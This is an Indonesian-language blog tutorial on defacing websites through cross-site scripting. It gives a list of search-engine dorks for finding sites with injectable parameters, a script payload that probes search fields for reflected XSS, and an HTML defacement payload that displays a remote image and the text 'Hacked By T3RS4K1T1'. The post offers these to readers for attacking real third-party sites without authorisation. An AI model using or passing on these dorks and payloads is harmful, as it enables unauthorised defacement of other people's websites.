Deface Poc XSS

 



Ok pada kesempatan kali ini saya akan memberikan tutorial deface dengan Cross Site Scripting,atau biasa kita sebut dengan XSS. Owh iya bagi kalian yang belum tau pengertian,dan macam² jenis serangan XSS kalian bisa cek di website saya:) link di bawah sini.
Web sayaclick here.
Ok langsung saja ke tutorialnya
Bahan-bahan yang di perlukan :
1) Hp/Pc
2) Koneksi internet
3) Dork
Untuk dork nya kalian tinggal pilih :
inurl:"/showcatrows.php?CategoryID="
/2wayvideochat/index.php?
r=2/elms/subscribe.php?course_id= /elms/subscribe.php?
course_id=3/gen_confirm.php?errmsg= /gen_confirm.php?errmsg=4/hexjector.php?site= /hexjector.php?site=5/index.php?option=com_easygb&Itemid=6/index.php?view=help&faq=1&ref=7/index.php?view=help&faq=1&ref=8/info.asp?page=fullstory&key=1&news_type=news&onvan=9/info.asp?page=fullstory&key=1&news_type=news&onvan=10/main.php?sid= /main.php?sid=11/news.php?id= /news.php?id=12/notice.php?msg= /notice.php?msg=13/preaspjobboard//Employee/emp_login.asp?msg1=14/Property-Cpanel.html?pid= /Property-Cpanel.html?pid=

Tinggal kalian pilih yah temen²^o^. Ok setelah kalian mendapatkan web yang ingin kalian deface. Gimana sih cara melihat web tersebut vuln dengan xss? Caranya sangat simple guys:") untuk pentest pertamanya sih kalian cari kolom shearchingnya setelah itu kalian tulis terserah kalian sih temen².Semisal saya menuliskan nama saya pada gambar berikut ini.
Jika di tuliskan lagi maka kemungkinan web tersebut rentan terhadap xss,setelah itu masukkan payload seperti ini
 ("><script>alert(document.domain)</script>) untuk melihat domain terhadap web tersebut contohnya pada gambar berikut ini.
Setelah itu kalian tinggal masukkan script kalian semisal saya memakai script saya seperti ini '<center><img src=https://d.top4top.io/p_1716g5ayr0.png width= 450 height= 450></center><br><h1><center><fontcolor=black font
size=11 fontstyle=arial>Hacked
By T3RS4K1T1</h1></center> setelah itu tinggal kalian tekan enter,and booom hasilnya akan seperti ini.
Ok mungkin cukup sekian yah temen² tutorial dari saya,saya harap dapat membantu kalian:). Owh iya untuk lebih lanjutnya kalian bisa subscribe youtube guru saya linknya ada di bawah sini:). End see you next time.
link Youtubeclick here.

Komentar

Posting Komentar